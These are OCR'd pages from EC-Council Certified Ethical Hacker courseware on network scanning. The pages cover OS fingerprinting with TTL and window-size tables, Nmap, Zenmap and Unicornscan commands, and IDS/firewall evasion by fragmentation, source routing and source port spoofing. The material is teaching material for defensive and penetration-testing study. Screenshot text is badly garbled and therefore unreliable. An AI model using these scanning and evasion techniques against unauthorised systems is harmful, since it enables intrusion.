Manual Tools- Port Scanner @ 7s umpTe Automated A ports

(Dade to Favorites

Ethernet (10. 10.1.11) - Microsoft Hyper-V Network Adapter show Al Scanned Pert Resuits sho mmmacy ©) Show UDP Summary ‘TCP Full Connect Response Summary

Stop

9

ne

@ 2 reve 10 pons 5

Setinos Defauts Connect Timeout

@2emasm P @ on reres-tenean

pa

IP Addzess 10.10.1.22 10.10.1.22 10.10.1.22 10.10.1.22 10.10.1.22

Port Dese domain neep Kerberos epmap netbios-ssn

Protocel Tce TCP TCP TOR TCP

Results Data Received Port Active Port Active Port Active Port Active Port Active

Packet Level Tools Application Info

Figure 3.11: Screenshot of NetScanTools Pro

Some additional scanning tools are listed below:

=

sx (https://github.com)

=

Unicornscan (https://sourceforge.net)

=

SolarWinds Port Scanner (https://www.solarwinds.com)

=

PRTG Network Monitor (https://www.paessler.com)

=

OmniPeek Network Protocol Analyzer (https://www.savvius.com)

Module 03 Page 278

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Scanning Tools for Mobile =

IP Scanner

Source: https://10base-t.com IP Scanner for iOS scans your local area network to determine the identity of all its active machines and Internet devices. It allows attackers to perform network scanning activities along with ping and port scans. Carrier

3:03 PM.

-_=

IP Network Scanner

[> map -sn -PR IIS server and Windows platform Note: We will discuss passive banner grabbing in later modules.

OS Discovery/Banner Grabbing Banner grabbing, or "OS fingerprinting," is a method used to determine the OS that is running on a remote target system. It is an important scanning method, as the attacker will have a higher probability of success if the OS of the target system is known (many vulnerabilities are OSspecific). The attacker can then formulate an attack strategy based on the OS of the target system.

There are two methods for banner grabbing: spotting the banner while trying to connect to a service, such as an FTP site, and downloading the binary file/bin/ls to check the system architecture. A more advanced fingerprinting technique depends on stack querying, which transfers the packets to the network host and evaluates them by the reply. The first stack-querying method designed with regard to the TCP mode of communication evaluates the response to connection

requests.

The next method, known as initial sequence number (ISN) analysis, identifies the differences in random number generators found in the TCP stack. ICMP response analysis is another method used to fingerprint an OS. It consists of sending ICMP messages to a remote host and evaluating the reply. Two types of banner grabbing techniques are described below:

=

Active Banner Grabbing Active banner grabbing applies the principle that an OS’s IP stack has a unique way of responding to specially crafted TCP packets. This happens because of different interpretations that vendors apply while implementing the TCP/IP stack on a particular OS. In active banner grabbing, the attacker sends a variety of malformed packets to the

Module 03 Page 332

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

remote host, and the responses are compared with a database. Responses from different OS vary because of differences in TCP/IP stack implementation. For instance, the scanning utility Nmap uses a series of nine tests to determine an OS fingerprint or banner grabbing. The tests listed below provide some insights into an active banner grabbing attack, as described at www.packetwatch.net: o

Test 1: A TCP packet with the SYN and ECN-Echo flags enabled is sent to an open TCP

o

Test 2: A TCP packet with no flags enabled is sent to an open TCP port. This type of packet is a NULL packet.

oO

Test 3: A TCP packet with the URG, PSH, SYN, and FIN flags enabled is sent to an open

o

Test 4: A TCP packet with the ACK flag enabled is sent to an open TCP port.

o

Test 5: A TCP packet with the SYN flag enabled is sent to a closed TCP port.

o

Test 6: A TCP packet with the ACK flag enabled is sent to a closed TCP port.

o

Test 7: A TCP packet with the URG, PSH, and FIN flags enabled is sent to a closed TCP

©

Test 8 PU (Port Unreachable): A UDP packet is sent to a closed UDP port. The objective is to extract an “ICMP port unreachable” message from the target machine.

o

Test 9 TSeq (TCP Sequence ability test): This test tries to determine the sequence generation patterns of the TCP initial sequence numbers (also known as TCP ISN sampling), the IP identification numbers (also known as IPID sampling), and the TCP timestamp numbers. It sends six TCP packets with the SYN flag enabled to an open

port.

TCP port.

port.

TCP port.

The objective of these tests is to find patterns in the initial sequence of numbers that the TCP implementations chose while responding to a connection request. They can be categorized into groups, such as traditional 64K (many old UNIX boxes), random increments (newer versions of Solaris, IRIX, FreeBSD, Digital UNIX, Cray, and many others), or true random (Linux 2.0.*, OpenVMS, newer AIX, etc.). Windows boxes use a "time-dependent" model in which the ISN is incremented by a fixed amount for each

occurrence.

=

Passive Banner Grabbing Source: https://www.broadcom.com Like active banner grabbing, passive banner grabbing also depends on the differential implementation of the stack and the various ways in which an OS responds to packets. However, instead of relying on scanning the target host, passive fingerprinting captures packets from the target host via sniffing to study telltale signs that can reveal an OS.

Module 03 Page 333

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Passive banner grabbing includes: o

Banner grabbing from error messages: Error messages provide information, such as type of server, type of OS, and SSL tools used by the target remote system.

o.

Sniffing the network traffic: Capturing and analyzing packets from the target enables an attacker to determine the OS used by the remote system.

o

Banner grabbing from page extensions: Looking for an extension in the URL may help in determining the application version. For example, .aspx => IIS server and Windows platform.

The four areas that typically determine the OS are given below: ©

TTL (time to live) of the packets: What does the OS sets as the Time To Live on the outbound packet?

o

Window Size: What is the Window size set by the OS?

o

Whether the DF (Don’t Fragment) bit is set: Does the OS set the DF bit?

o

TOS (Type of Service): Does the OS set the TOS, and if so, what setting is it?

Passive fingerprinting is neither fully accurate nor limited to these four signatures. However, one can improve its accuracy by looking at several signatures and combining the information. The following is an analysis of a sniffed packet described by Lance Spitzner in his paper on passive fingerprinting: 04/20-21:41:48.129662

TCP

TTL:45

**eKEK*A* Ack:

TOS:0x0

Seq:

OxE3C65D7

129.142.224.3:659

ID:56257

->

172.16.1.107:604

0x9DD90553 Win:

0x7D78

According to the four criteria, the following are identified: o

TTL: 45

o

Window Size: 0x7D78 (or 32120 in decimal)

o

DF: The DF bit is set

o

TOS: 0x0

Compare this information with a database of signatures. TTL: The TLL from the analysis is 45. The original packet went through 19 hops to get to the target, so it sets the original TTL to 64. Based on this TTL, it appears that the user sent the packet from a Linux or FreeBSD box (however, more system signatures need to be added to the database). This TTL confirms it by implementing a traceroute to the remote host. If the trace needs to be performed stealthily, the traceroute TTL (default 30 hops) can be set to one or two hops fewer than the remote host (-m option). Setting the traceroute in this manner reveals the path information (including the upstream provider) without actually contacting the remote host. Module 03 Page 334

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Window Size: In this step, the window sizes are compared. The window size is another effective tool for determining precisely what window size is used and how often it is changed. In the previous signature, the window size is set at 0x7D78, which is the default window size used by Linux. In addition, FreeBSD and Solaris tend to maintain the same window size throughout a session. However, Cisco routers and Microsoft Windows NT window sizes constantly change. The window size is more accurate when measured after the initial three-way handshake (due to TCP slow start). DF bit: Most systems use the DF bit set; hence, this is of limited value. However, this makes it easier to identify a few systems that do not use the DF flag (such as SCO or OpenBSD). TOS: TOS is also of limited value, as it seems to be more session-based than OS-based. In other words, it is not so much the OS as the protocol used that determines the TOS to a large extent.

Using the information obtained from the packet, specifically the TTL and the window size, one can compare the results with the database of signatures and determine the OS with some degree of confidence (in this case, Linux kernel 2.2.x). Passive fingerprinting, like active fingerprinting, has some limitations. First, applications that build their own packets (e.g., Nmap, Hunt, Nemesis, etc.) will not use the same signatures as the OS. Second, it is relatively simple for a remote host to adjust the TTL, window size, DF, or TOS setting on the packets. Passive fingerprinting has several other uses. For example, attackers can use stealthy fingerprinting to determine the OS of a potential target such as a web server. A user only needs to request a web page from the server and then analyze the sniffer traces. This bypasses the need for using an active tool that various IDS systems can detect. Passive fingerprinting also helps in identifying remote proxy firewalls. It may be possible to ID proxy firewalls from the signatures as discussed above, simply because proxy firewalls rebuild connections for clients. Similarly, passive fingerprinting can be used to identify

rogue systems.

Note: We will discuss passive banner grabbing in later modules. Why Banner Grabbing? An attacker uses banner grabbing to identify the OS used on the target host and thus determine the system vulnerabilities and exploits that might work on that system to carry out further attacks.

Module 03 Page 335

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

How to Identify Target System OS

CE H

@ Attackers can identify the OS running on the target machine by looking at the Time To Live (TTL) and TCP window size in the IP header of the first packet in a TCP session ‘@

Window size vanes for OS

Sniff/capture the response generated from the target machine using packet-sniffing tools like Wireshark and observe the TTL and TCP window size fields

Operating System

Linux

64

5840

FreeBsD OpenssD

64 255

65535, 16384

Windows

128

to 1 Gigabyte

eas)

255

4128

Solaris

255

8760

Routers ”

OS Discovery using

AX

Wireshark

To | tcp

65,535 bytes

255

16384

Tiles Janu waresbark org |

How to Identify Target System OS Identifying the target OS is one of the important tasks for an attacker to compromise the target network/machine. In a network, various standards are implemented to allow different OSs to communicate with each other. These standards govern the functioning of various protocols such as IP, TCP, UDP, etc. By analyzing certain parameters/fields in these protocols, one can reveal the details of the OS. Parameters such as Time to Live (TTL) and TCP window size in the IP header of the first packet in a TCP session help identify the OS running on the target machine. The TTL field determines the maximum time that a packet can remain in a network, and the TCP window size determines the length of the packet reported. These values vary among OSs, as described in the following table: Operating System

Time To Live

TCP Window Size

Linux

64

5840

FreeBSD

64

65535

OpenBSD

255

16384

Windows

128

65,535 bytes to 1 Gigabyte

Cisco Routers

255

4128

Solaris

255

8760

AIX

255

16384

Table 3.2: TTL and TCP Window size values for OS

Module 03 Page 336

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Scanning Networks

Attackers can use various tools to perform OS discovery on the target machine, including Wireshark, Nmap, Unicornscan, and Nmap Script Engine. Attackers can also adopt the IPv6 fingerprinting method to grab the target OS details. OS Discovery using Wireshark

Source: https://www.wireshark.org To identify the target OS, sniff/capture the response generated request-originated machine using packet-sniffing tools such as TTL and TCP window size fields in the first captured TCP packet. those in the above table, you can determine the target OS that i Capturing from Ethernet File

Edit

Yiew

Go

uae

475 476 477 478 479 480 481 482 483 484 485 496

Capture

Analyze

Statistics

Telephony

SBREQeeSGTFET

87.537233, 8.107472 88.108065 8.108101 88.108655, 89.120177 89.120710 89.539860 89.539864 89.539905 90.135915, 90.136418,

1803 x i 5 i :

Jools

Help

BAAR

5

0 e

20487: Fels:

Wireless

from the target machine to the Wireshark, etc., and observe the By comparing these values with has generated the response.

gi

2

Protocs Length info PONS 371 Standard query response @x0000 TXT, cache Flush PTR _odb._tep.- | ARP 42 Who has 10.10.2.22? Tell 1 rr ARP 22 As at 00:15:54:01:60: 108 18) request ide@x0001, seqr1/256, ttl=128 (reply in 4. 108 74 Echo (ping) reply id-@xo001, seqei/256, tt1=128 (request in 108 74 Echo (ping) request 1d=@x0001, seq=2/512, tt1=126 (reply in 4 roe 74 Echo (ping) reply ide@xo0ei, seqe2/512, tt1=128 (request in PONS «417 Standard query response @x@000 TXT, cache flush PTR _adb. tcp. MONS 437 Standard query response @x0800 TXT, cache flush PTR _adb._tc MONS «371 Standard query response @x8000 TXT, cache flush PTR _adb._tep.— 108 7A Echo (ping) request ide0x0001, seq=3/768, ttl-128 (reply in 4 Rod 74 Echo (ping) reply 1d=@x0001, seqn3/765, te19128 (request in

Frame 479: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on interface \Device \NPF_{5A9B3586-F693-4023-B9B6-DCC2SADB1114), id @ Ethernet II, Src: Micros Ost: Microsof 01:80:00 (00:15:5d:01:80:00) rt

nest eet tose ee Meche Cede betes Teriction eased} [Meader checksum status: Unverified) See an a woe eee ; wes aces ae Pn a ey beers) pipeme cree Protocol:

ICMP

(1)

Figure 3.76: Wireshark screenshot showing TTL value (Possible OS is Windows)

Module 03 Page 337

Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohib

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Scanning Networks

4 Capturing from Ethernet File Edt Yew Go Copture Analyze Statistics Telephony Wireless Tools Help ABA2OQUEREQeOSFsTSaanan

(Ueereseeytee co

” ¥

Tne Sexree Destination Protocal Length Info 61 15.757699fesor:15:SdFF:fe18:. Ff02::f 374 Standard query response @x0000 TXT, 62 17.759212 437 Standard query response 0x0008 TXT, 63 17.759261 417 Standard query response @x0008 TXT, 64 17.759279 371 Standard query response @xeeee TXT, 65 21.766189 417 Standard query response @x0000 TXT, 66 21.764190 371 Standard query response @x0080 TXT, 67 22.764189 437 Stondard query response @x@008 TXT, 68 21.985381 f01:80:0@ Broadcast 42 who has [email protected]@.2.9? Tell 10.10.1.32 69 21.985935 _NS-NLB-PhysServer-2_ Microsof_01:60:00 42 10.10.1.9 4s at 02:15:54:18:27:¢ 70 21.985957 _10.10.1.11 10.10.1.9 74 Echo (ping) request ide@x@001, sequ5/1280, ttl=128 (reply in ~ 71 22,986492 [0.10.1.9 _—*4;20.20.2.22 ‘74 Echo (ping) reply ideexo0e1, seqn5/1280, ttl~64 (request in. 72 2.993079 __10.10.1.21 10.20.1.9 sor 74 Echo (ping) request ide@x@001, seq~6/1536, tt]=126 (reply in ~ Frame 71: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on interface \Device\NPF_{SA983588-F693-4023-8986-DCC29AD81114}, id @ Ethernet IT, Sre: MS-NLB-PhysServer-21 27:eb (02:15:54:18:27:eb), Dst: Microsof_01:80:60 (00:15:5d:01:60:00) Internet Protocol Version 4, Src: 1 e100 .... = Version: 4 sss. O11 = Header Length: 20 bytes (5)

GSESEERRERE

No.

> >

Protocol: ICMP (1) Header Checksum: @xifel [validation disabled] [Meader checksum status: Unverified) ] ja ee eee se" abedef opgrstuy ghijklen wabedefg hi

@ 7 Tmetoine (ot, 1byte Figure 3.77: Wireshark screenshot showing TTL value (Possible OS is Linux)

Module 03 Page 338.

iI Hacking and Countermeasures Copyright © by E¢-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

OS Discovery using Nmap @ InNmap, the -O optionis used to perform OS discovery, providing OS details of the target machine

and Unicornscan

ig iE H

@ InUnicornscan, the OS of the target machine canbe identified by observing the TTL valuesin the acquired scan result

San Tools Dotie Hep

Fira

‘Maap done: 1 TP address (1 host up) Scanned in 2.81

secencs

‘etps//omop.org ~

OS Discovery using Nmap and Unicornscan OS Discovery using Nmap

Source: https://nmap.org To exploit the target, it is highly essential to identify the OS running on the target machine. Attackers can employ various tools to acquire the OS details of the target. Nmap is one of the effective tools for performing OS discovery activities. In Zenmap, the -o option is used to perform OS discovery, which displays the OS details of the target machine.

Module 03 Page 339

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Scanning Networks

© Zenmap Scan

Target:

Profile

Tools

|nmap

|

Profile:

v

Cancel

10.10,

Hosts | Services Nmap Output Ports / Hosts Topology Host Details Scans OS ¢ Host nmap -0 10.10.1.11 v 10.10.1.11

Starting

Nmap

7.8@

22:25 Memmcetin Nmap

Host

scan

is

up

(

https://nmap.org

report

(@.@@s

for

80/tcp 135/tcp 139/tcp

http msrpc netbios-ssn

ieee

Address:

Running:

OS

CPE:

OS

Microsoft

Nmap

Microsoft

Distance:

at

done:

seconds

Windows

cpe:/o:microsoft

detection

results

microsoft-ds

general purpose

OS details:

Network

ftp

@@:15:5D:@1:80:00

Device type:

(Microsoft)

1@

:windows_1@:17@3

Windows

|Op

performed.

Please

IP

(1

1@

1783

report

https://nmap.org/submit/ 1

2022-03-15

latency).

closed ports SERVICE

MAC

at

Details

10.10.1.11

Not shown: 994 PORT STATE

445/tcp

)

Geapteigit Time

21/tep

Filter Hosts

x

Help

| 10.10.1.11

Command:

Oo

address

host

up)

.

any

scanned

incorrect

in

2.81

M4

Figure 3.78: OS Discovery using Zenmap

Module 03 Page 340

Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohibi

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

OS Discovery using Unicornscan

Source: https://sourceforge.net In Unicornscan, the OS of the target machine can be identified by observing the TTL values in the acquired scan result. To perform Unicornscan, the syntax #unicornscan is used. As shown in the screenshot, the tt1 value acquired after the scan is 128; hence, the OS is possibly Microsoft Windows.

sudo su sword @parr d parrot adding

10.10.1

100, 105-167,

for

attacker

2 mode

‘TCP

109-111,113,

118,119,

ports

‘7,9,11,13,18,19,21-23,25,37,39,42,4 9,50

135, 137-139, 123,129,

143,150, 161-164,

174,177-17:

,500,512-514,5 ,422, 443-445, 487 406 , 407 347 , 369-3 5 106 , 209, 210,21 631-634, 636, 642,653,655 ,657,666 3 1352 1241, 1334, 1349, 234, 1210, 46 992-995, 1001, 1023-1030, 1080, 01-2104,2140,2 5 A 2 1719,1 3306, ) ,5269, 5308

78,61 346,634 165 , 6838, 6666 79,9090, 9101-9103 9359, 10000, 10626, 10027, 1006 27573 , 31335-31338, 2, 21554, 22273, 26274 , 27374, 27444, 5345, 17001-17003, 18753, 20011 54321, 57341, 58008 , 58009, 58666, 5 0, 33390, 47262 , 49301, 54320, 31791, 32668 , 32767 30 , 65530-65535’ pps , 64429, 65000, 65506 61466, 61603, 6348: , 61348, lusing interface(s) etho total packets, should take a Little longer e+02 i ho toal aning 1.00e+00 open 10.10 10.10 10.10 10.10

oak

10.10 10.10 10.10

Possible OS is

than 8 Seconds

Windows

Figure 3.79: OS Discovery using Unicornscan

Module 03 Page 341

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

CEH

OS Discovery using Nmap Script Engine |@ Nmap script engine (NSE) can be used to automate a wide variety of networking

tasks by allowing the users to write and share scripts @ Attackers use various scripts in the Nmap Script Engine to perform OS discovery on the target machine

@ For example, in Nmap, smb-os-discovery is an inbuilt script that can be used for collecting OS information on the target machine through the SMB protocol ‘@

In Zenmap, the -sC option or script option

is used to activate the NSE scripts

pright © by

Tiss aioe ore Al Rights Reserved. Reproduction i

OS Discovery using Nmap Script Engine Source: https://nmap.org Nmap Scripting Engine (NSE) in Nmap can be used to by allowing users to write and share scripts. These same efficiency and speed as Nmap. Attackers can Engine for performing OS discovery on the target discovery is an inbuilt script used for collecting OS the SMB protocol.

automate a wide variety of networking tasks scripts can be executed parallelly with the also use various scripts in the Nmap Script machine. For example, in Nmap, smb-osinformation on the target machine through

In Zenmap, NSE can be generally activated using the -sc option. If the custom scripts are to be specified, then attackers can use the --script option. The NSE results will be displayed with both the Nmap normal and XML outputs.

Module 03 Page 342

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Scanning Networks

ee

Exam 312-50 Certified Ethical Hacker

Edit @parrot

Host INot

PORT

ima script g Nmap 7.9.

smb-os-discover n org

is up

Latency)

an

shown:

53/tcp

report

for

983

filtered

(0.0094s

STATE

SERVICE

open

http

open

80/tcp

88/tcp

135/tcp

open

open

msrpc

open

http-rpc-epmap

open open open open

e

Cc

login

open

msmq-mgmt

open

globalcatLDAPss

open open

Address:

script

globalcatLDAP ms-wbt-server

00:15:5D:01:80:02

(Microsoft)

results

smb-os-discovery

Windows

Computer

(no-response

netbios-ssn ldap microsoft-ds kpasswd5

open

OS:

ports

kerberos

open

Host

tcp

2022-03

domain

open open

C

10.10.1

) at

Server

name:

2022

Server2022

Standard

20348

(Windows

Serve

2022

Standard

6.3)

Figure 3.80: OS Discovery using Nmap Script Engine

Module 03 Page 343

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

OS Discovery using IPv6 Fingerprinting

CE H

@ IPV6 Fingerprintingcan be used to identify the OS runningon the target machine

A

© IPvé6 fingerprinting has the same functionality as that of IPv4

MA

\@ The difference between IPv6 and IPv4 fingerprintingis that the IPv6 uses several additional

probes specificto IPv6 alongwith a separate OS detection engine that is specialized for IPv6

@ In Zenmap, the -6 option and -O option are used to perform OS discovery using the IPv6 fingerprintingmethod © Syntax: # nmap -6-O

advanced

—s ——e e

Copyright © by

OS Discovery using IPv6 Fingerprinting Source: https://nmap.org IPv6 Fingerprinting is another technique used to identify the OS running on the target machine. It has the same functionality as IPv4, such as sending probes, waiting and collecting the responses, and matching them with the database of fingerprints. The difference between IPv6 and IPv4 fingerprinting is that IPv6 uses several additional advanced |IPv6-specific probes along with a separate IPv6-specifc OS detection engine. Nmap sends nearly 18 probes in the following order to identify the target OS using the IPv6 fingerprinting method. =

Sequence generation (S1-S6)

=

ICMPvé6 echo (IE1)

=

ICMPvé6 echo (IE2)

=

Node Information Query (NI)

=

Neighbor Solicitation (NS)

=

UDP (U1)

=

TCP explicit congestion notification (TECN)

=

TCP (12-17)

In Zenmap, the -6 option along with -o fingerprinting method. Syntax: # nmap

Module 03 Page 344

-6

-O

option is used to perform OS discovery using the IPv6

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

CEH

LO#06: Demonstrate Various Techniques for Scanning Beyond IDS and Firewall

Scanning Beyond IDS and Firewall Intrusion detection systems attacker from accessing a limitations. Attackers try to various IDS/firewall evasion spoofing, etc.

Module 03 Page 345

(IDS) and firewalls are security mechanisms intended to prevent an network. However, even IDS and firewalls have some security launch attacks to exploit these limitations. This section highlights techniques such as packet fragmentation, source routing, IP address

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

IDS/Firewall Evasion Techniques ‘@

CE H

Though firewalls and IDSs can prevent malicious traffic (packets) from entering a network, attackers can manage to send intended packets to the target by evading an IDS or firewall through the following techniques:

EW

racket Fragmentation

MAC Address Spoofing

EZ

source Routing

Creating Custom Packets

Source Port Manipulation

Randomizing Host Order and Sending Bad Checksums

IP Address Decoy

Proxy Servers

IP Address Spoofing

Anonymizers served. Reproduction

IDS/Firewall Evasion Techniques Although firewalls and IDS can prevent malicious traffic (packets) from entering a network, attackers can send intended packets to the target that evade the IDS/firewall by implementing the following techniques: =

Packet Fragmentation

=

Source Routing

=

Source Port Manipulation

=

IP Address Decoy

=

IP Address Spoofing

=

MAC Address Spoofing

=

Creating Custom Packets

=

Randomizing Host Order

=

Sending Bad Checksums

=

Proxy Servers

=

Anonymizers

Module 03 Page 346

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Packet Fragmentation

CE H

@ Packet fragmentation refers to the splitting of a probe

packet into several smaller packets (fragments) while

© Zenon Sean Tool Bree Hep

-

x

D] ean (cone

sending it to a network

Toplogy Hest Data Scan ra) at 2022-05-16

@ Itis not anew scanning method but a modification of the

previous techniques

|G The TCP header is split into several packets so that the packet filters are not able to detect what the packets are intended to do

0

Be ote is eeetteche of oss 0.08

SYN/FIN Scanning Using IP Fragments ‘SYN/FIN (Small IP

Attacker

: ae ebiiby Hidde elapsed (x00e

Target Copyright © by

Packet Fragmentation Packet fragmentation refers to the splitting of a probe packet into several smaller packets (fragments) while sending it to a network. When these packets reach a host, the IDS and firewalls behind the host generally queue all of them and process them one by one. However, since this method of processing involves greater CPU and network resource consumption, the configuration of most IDS cause them to skip fragmented packets during port scans.

Therefore, attackers use packet fragmentation tools such as Nmap and fragroute to split the probe packet into smaller packets that circumvent the port-scanning techniques employed by IDS. Once these fragments reach the destined host, they are reassembled to form a single packet. SYN/FIN Scanning Using IP Fragments

SYN/FIN scanning using IP fragments is not a new scanning method but a modification of previous techniques. This process of scanning was developed to avoid false positives generated by other scans because of a packet filtering device on the target system. The TCP header splits into several packets to evade the packet filter. For any transmission, every TCP header must have the source and destination port for the initial packet (8-octet, 64-bit). The initialized flags in the next packet allow the remote host to reassemble the packets upon receipt via an Internet protocol module that detects the fragmented data packets using field-equivalent values of the source, destination, protocol, and identification.

Module 03 Page 347

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

SYN/FIN (Small IP

Fragments) + Port (n) 5CCE COCO E Coe

RST (if port is closed) Attacker

Target Figure 3.81: SYN/FIN scanning

In this scan, the system splits the TCP header into several fragments and transmits them over the network. However, IP reassembly on the server side may result in unpredictable and abnormal results, such as fragmentation of the IP header data. Some hosts may fail to parse and reassemble the fragmented packets, which may lead to crashes, reboots, or even network device monitoring dumps. Some firewalls might have rule sets that block IP fragmentation queues in the kernel (e.g., CONFIG_IP_ALWAYS_DEFRAG option in the Linux kernel), although this is not widely implemented because of its adverse effects on performance. Since many IDS use signature-based methods to indicate scanning attempts on IP and/or TCP headers, the use of fragmentation will often evade this type of packet filtering and detection, resulting in a high probability of causing problems on the target network. Attackers use the SYN/FIN scanning method with IP fragmentation to evade this type of filtering and detection.

Module 03 Page 348

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

The screenshot below shows the SYN/FIN scan using the Zenmap tool.

© Zenmap Scan Tools Profile Help Target: 10.10.1.11 Command:

i

OS

| nmap

4 Host

Profile: -v 10.10.1.11

Nmap Output Ports / Hosts Topology Host Details Scans nmap -sS -T4 -A -f -v 10.10.1.11

Details

Starting Nmap 7.8@ ( https://nmap.org ) at 2022-03-16 02:55 f pan Ti Warning: Packet fragmentation selected on a host other than Linux, OpenBSD, FreeBSD, or NetBSD. This may or may not work. NSE: Loaded 151 scripts for scanning. Script Pre-scanning. Initiating NSE at @2:55 Completed NSE at @2:55, 0.@0s elapsed Initiating NSE at 02:55 Completed NSE at @2:55, @.0@s elapsed Initiating NSE at @2:55 Completed NSE at @2:55, 0.@0s elapsed Initiating ARP Ping Scan at @2:55 Scanning 10.10.1.11 [1 port] Completed ARP Ping Scan at @2:55, @.02s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 02:55 Completed Parallel DNS resolution of 1 host. at @2:55, @.@1s elapsed Initiating SYN Stealth Scan at @2:55 Scanning 10.10.1.11 [1000 ports] Discovered open port 445/tcp on 10.10.1.11 Discovered open port 139/tcp on 10.10.1.11 Discovered open port 135/tcp on 10.10.1.11 Discovered open port 3389/tcp on 10.10.1.11 Discovered open port 8@/tcp on 10.10.1.11 Discovered open port 21/tcp on 10.10.1.11 Completed SYN Stealth Scan at @2:55, 1.45s elapsed (1000 total ports) Initiating Service scan at 02:55

Filter Hosts

Figure 3.82: SYN/FIN scan using Zenmap

Module 03 Page 349

Ethical Hacking and Countermeasures Copyright © by EC-Cot All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

CEH

Source Routing ‘@

As the packet travels through the nodes in the network, each router examines the destination IP address and

chooses the next hop to direct the packet to the destination

@ Source routing refers to sending a packet to the intended destination with a partially or completelyspecified route (without firewall-/IDS-configured routers) in order to evade an IDS or firewall ‘@

Insource routing, the attacker makes some or all of these decisions on the router

This figure shows source routing,

where the originator dictates the eventual route of the traffic

‘AZ Sendes ¥

B

Source Routing An IP datagram contains various fields, including the IP options field, which stores source routing information and includes a list of IP addresses through which the packet travels to its destination. As the packet travels through the nodes in the network, each router examines the destination IP address and chooses the next hop to direct the packet to the destination. When attackers send malformed packets to a target, these packets hop through various and gateways to reach the destination. In some cases, the routers in the path might configured firewalls and IDS that block such packets. To avoid them, attackers enforce a strict source routing mechanism, in which they manipulate the IP address path in the IP field so that the packet takes the attacker-defined path (without firewall-/IDS-configured to reach the destination, thereby evading firewalls and IDS.

routers include loose or options routers)

The figure below shows source routing, where the originator dictates the eventual route of the traffic.

Destination

c Figure 3.83: Source Routing

Module 03 Page 350

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Scanning Networks

Exam 312-50 Certified Ethical Hacker

Source Port Manipulation

CE H

@ Source port manipulation refers to manipulating actual port numbers with common port numbers in order to evade an IDS or firewall @ Itoccurs when a firewall is configured to allow packets from well-known ports like HTTP, DNS, FTP, etc. ‘@ Nmap uses the -g or --source-port options to perform source port manipulation

Firewall allowing manipulated

Port 80 to the victim from attacker

sea

Target 1001.11

ue

8s

S) Profi

je

&

etps//amep. org

Source Port Manipulation Source port manipulation is a technique used for bypassing the IDS/firewall, where the actual port numbers are manipulated with common port numbers for evading certain IDS and firewall rules. The main security misconfigurations occur because of blindly trusting the source port number. The administrator mostly configures the firewall by allowing the incoming traffic from well-known ports such as HTTP, DNS, FTP, etc. The firewall can simply allow the incoming traffic from the packets sent by the attackers using such common ports. Actual Port: 242

Attacker

>

Manipulated Port: 80

‘ Port 242

Ter

ei

a

Allowed Prrerer irri rrr itieey —> Port 80 Victim

Figure 3.84: Firewall allowing manipulated port 80 to the victim from attacker

Although the firewalls can be made secure using application-level proxies or protocol-parsing firewall elements, this technique helps the attacker to bypass the firewall rules easily. The attacker tries to manipulate the original port number with the common port numbers, which can easily bypass the IDS/firewall. In Zenmap, the -g or --source-port option is used to perform source port manipulation.

Module 03 Page 351

